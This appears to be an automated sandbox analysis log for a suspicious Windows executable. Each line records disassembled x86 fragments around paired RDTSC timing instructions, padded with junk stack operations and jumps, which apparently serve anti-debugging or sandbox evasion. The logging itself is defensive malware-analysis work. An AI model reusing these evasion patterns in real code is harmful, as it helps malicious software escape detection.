                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774ABA second address: 774ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007F7290766B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774AD7 second address: 774AE7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7290C62CA6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754A8 second address: 7754B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754CF second address: 7754DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7290C62CA6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 777F60 second address: 777F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Fh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 777F78 second address: 777F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7290C62CB1h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 778388 second address: 77839A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F7290C62CA6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7802FF second address: 78033E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7290766B32h 0x0000000d push esi 0x0000000e jne 00007F7290766B26h 0x00000014 jmp 00007F7290766B2Ah 0x00000019 pop esi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7290766B2Fh 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78033E second address: 780353 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F7290C62CAAh 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0AE second address: 6DE0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0BF second address: 6DE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290766B2Dh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783E9A second address: 783EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783EB1 second address: 783EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7290C62CA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784184 second address: 784194 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290766B32h 0x00000008 js 00007F7290766B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784194 second address: 7841B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F7290C62CA6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7841B0 second address: 7841E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7290766B26h 0x00000009 jmp 00007F7290766B32h 0x0000000e jmp 00007F7290766B38h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7848E9 second address: 7848FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F7290C62CA6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 789354 second address: 78937B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7290C62CB1h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78937B second address: 7893CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7290766B26h 0x00000009 jmp 00007F7290766B33h 0x0000000e jmp 00007F7290766B31h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007F7290766B2Ch 0x0000001e pop esi 0x0000001f pushad 0x00000020 jnc 00007F7290766B26h 0x00000026 pushad 0x00000027 popad 0x00000028 jc 00007F7290766B26h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794282 second address: 79428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927F6 second address: 792814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290766B2Bh 0x0000000b jo 00007F7290766B2Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DE5 second address: 792DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7290766B26h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DF0 second address: 792E0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7290C62CA6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jo 00007F7290C62CA6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792FC3 second address: 792FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 791FE2 second address: 791FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC47 second address: 79BC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290C62CACh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F7290C62CA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7A7117 second address: 7A7126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F7290766B26h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1847 second address: 7B1872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7290C62CB9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jo 00007F7290C62CC0h 0x00000012 push ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1872 second address: 7B1882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F7290766B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0312 second address: 7B032A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B032A second address: 7B0362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Bh 0x00000007 pushad 0x00000008 jmp 00007F7290766B39h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B036C second address: 7B0376 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B037C second address: 7B0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B038A second address: 7B039A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F7290C62CA6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B04F6 second address: 7B052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7290766B26h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7290766B30h 0x00000018 jmp 00007F7290766B34h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B75 second address: 7C4B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7290766B26h 0x0000000a popad 0x0000000b jc 00007F7290766B2Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9D12 second address: 7C9D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290C62CA6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9A20 second address: 7C9A2A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290766B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D00 second address: 7D4D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7290C62CABh 0x0000000c jmp 00007F7290C62CB6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D28 second address: 7D4D3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F7290766B2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D3D second address: 7D4D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290C62CA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7290C62CABh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D57 second address: 7D4D69 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F7290766B2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4BAA second address: 7D4BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F7290766B26h 0x0000000c jns 00007F7290766B26h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F7290766B2Bh 0x0000001b pushad 0x0000001c jmp 00007F7290766B2Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E211E second address: 7E2135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F7290C62CA6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E2135 second address: 7E2167 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7290766B26h 0x00000008 jmp 00007F7290766B39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jl 00007F7290766B32h 0x00000016 jo 00007F7290766B2Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C47 second address: 7E1C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7290766B2Ah 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F7290766B28h 0x00000014 jg 00007F7290766B32h 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007F7290766B26h 0x00000022 jnl 00007F7290766B26h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DD8 second address: 7E1DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B36h 0x00000009 jg 00007F7290766B26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DFF second address: 7E1E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F7290C62CB7h 0x0000000d js 00007F7290C62CA8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E29 second address: 7E1E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7290766B26h 0x0000000a jmp 00007F7290766B33h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E4D second address: 7E1E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E6704 second address: 7E6718 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F7290766B26h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA5D2 second address: 7EA5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA757 second address: 7EA767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7290C62CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EA767 second address: 7EA778 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F7290766B26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EABE9 second address: 7EAC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F7290C62CB2h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7F8C7A second address: 7F8CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Fh 0x00000007 jmp 00007F7290766B2Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7290766B31h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7F8CAC second address: 7F8D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7290C62CAFh 0x00000008 pop eax 0x00000009 js 00007F7290C62CD3h 0x0000000f jmp 00007F7290C62CB8h 0x00000014 jmp 00007F7290C62CB5h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F7290C62CAAh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF384 second address: 7EF3A8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CB7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7EF3AD second address: 7EF3CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F7290C62CA6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jbe 00007F7290C62CA8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F7290C62CD1h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 716C34 second address: 716C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32B1 second address: 6E32D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB0h 0x00000007 jmp 00007F7290C62CABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32D3 second address: 6E32F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B35h 0x00000009 jc 00007F7290766B26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E32F4 second address: 6E3315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7290C62CABh 0x0000000d jmp 00007F7290C62CAEh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E3315 second address: 6E3321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E254A second address: 6E255B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7290766B26h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop eax 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E255B second address: 6E25B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB7h 0x00000007 jno 00007F7290C62CAEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F7290C62CA6h 0x0000001a jmp 00007F7290C62CABh 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007F7290C62CB6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E25B3 second address: 6E25D9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7290766B40h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2714 second address: 6E275A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB6h 0x00000009 pop esi 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F7290C62CB6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F7290C62CA6h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A50 second address: 6E2A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7290C62CFAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7290C62CADh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E2A7E second address: 6E2A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Fh 0x00000007 je 00007F7290766B26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F1D second address: 6E5F27 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F27 second address: 6E5F59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7290C62CB4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F7290C62CAAh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5F59 second address: 6E5FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnl 00007F7290766B32h 0x00000011 jo 00007F7290766B2Ch 0x00000017 jne 00007F7290766B26h 0x0000001d pop eax 0x0000001e add ecx, 638A2B8Eh 0x00000024 push 00000003h 0x00000026 and edi, 1002DD7Bh 0x0000002c push esi 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 mov edi, esi 0x00000032 push 00000003h 0x00000034 jp 00007F7290766B29h 0x0000003a or dh, FFFFFF9Dh 0x0000003d jmp 00007F7290766B30h 0x00000042 push 7C298416h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a pushad 0x0000004b popad 0x0000004c pop eax 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FB1 second address: 6E5FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290C62CACh 0x00000009 rdtsc
